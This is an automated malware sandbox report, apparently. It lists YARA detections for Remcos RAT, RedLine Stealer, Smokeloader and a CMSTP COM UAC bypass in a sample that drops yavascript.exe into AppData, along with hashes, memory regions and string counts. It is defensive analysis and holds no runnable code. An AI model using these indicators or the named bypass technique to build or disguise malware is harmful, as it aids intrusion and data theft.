Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 021B3B0C appears 41 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 02164217 appears 46 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 02163B0C appears 41 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 0043ADAE appears 45 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 021B4217 appears 46 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 0218234E appears 37 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 00401D64 appears 64 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 00447174 appears 54 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 00401F66 appears 150 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 00401FAA appears 63 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 00403B40 appears 66 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 00433FB0 appears 165 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 00406478 appears 33 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 00444B14 appears 84 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 00404C9E appears 48 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 004026CE appears 45 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 004020E7 appears 118 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 004567E0 appears 39 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 00401E8F appears 55 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 00401E52 appears 33 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 004040BB appears 54 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 00410D8D appears 54 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 004338A5 appears 123 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 00783B0C appears 41 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 0213234E appears 37 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: String function: 00784217 appears 46 times
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: String function: 004020E7 appears 39 times
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: String function: 020F234E appears 37 times
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: String function: 02124217 appears 46 times
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: String function: 00401F66 appears 50 times
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: String function: 004338A5 appears 41 times
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: String function: 02123B0C appears 41 times
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: String function: 00433FB0 appears 55 times
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1000
Source: yPIOW6yoPi.exe, 00000000.00000003.2152739528.00000000005AF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesDefence0 vs yPIOW6yoPi.exe
Source: yPIOW6yoPi.exe, 00000000.00000000.2143194743.0000000000463000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamesDefence0 vs yPIOW6yoPi.exe
Source: yPIOW6yoPi.exe | Binary or memory string: OriginalFilenamesDefence0 vs yPIOW6yoPi.exe
Source: yPIOW6yoPi.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Matched YARA rules (each of the unpacked PE sources listed below, type: UNPACKEDPE, matched all three rules):

Matched rule: Windows_Trojan_Remcos_b296e965 | reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Matched rule: REMCOS_RAT_variants | Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Source: 17.2.yavascript.exe.750e67.1.unpack, type: UNPACKEDPE
Source: 0.2.yPIOW6yoPi.exe.20f0e67.1.raw.unpack, type: UNPACKEDPE
Source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 0.2.yPIOW6yoPi.exe.20f0e67.1.unpack, type: UNPACKEDPE
Source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: 17.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: 17.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 0.2.yPIOW6yoPi.exe.400000.0.unpack, type: UNPACKEDPE
Source: 20.2.yavascript.exe.2130e67.1.unpack, type: UNPACKEDPE
Source: 0.3.yPIOW6yoPi.exe.21d0000.0.raw.unpack, type: UNPACKEDPE
Source: 0.3.yPIOW6yoPi.exe.21d0000.0.unpack, type: UNPACKEDPE
Source: 38.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 0.2.yPIOW6yoPi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 20.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: 17.3.yavascript.exe.21e0000.0.raw.unpack, type: UNPACKEDPE
Source: 38.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: 38.2.yavascript.exe.2180e67.1.unpack, type: UNPACKEDPE
Source: 38.2.yavascript.exe.2180e67.1.raw.unpack, type: UNPACKEDPE
Source: 38.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: 38.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE
Source: 17.2.yavascript.exe.750e67.1.raw.unpack, type: UNPACKEDPE
            Source: 20.2.yavascript.exe.2130e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 20.2.yavascript.exe.2130e67.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 20.2.yavascript.exe.2130e67.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 17.3.yavascript.exe.21e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 17.3.yavascript.exe.21e0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 17.3.yavascript.exe.21e0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 20.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 20.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 20.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000000.00000002.2295009749.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000014.00000002.2309360524.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000026.00000002.2378502507.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000011.00000002.4624113726.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: Process Memory Space: yPIOW6yoPi.exe PID: 1612, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: yavascript.exe PID: 1512, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
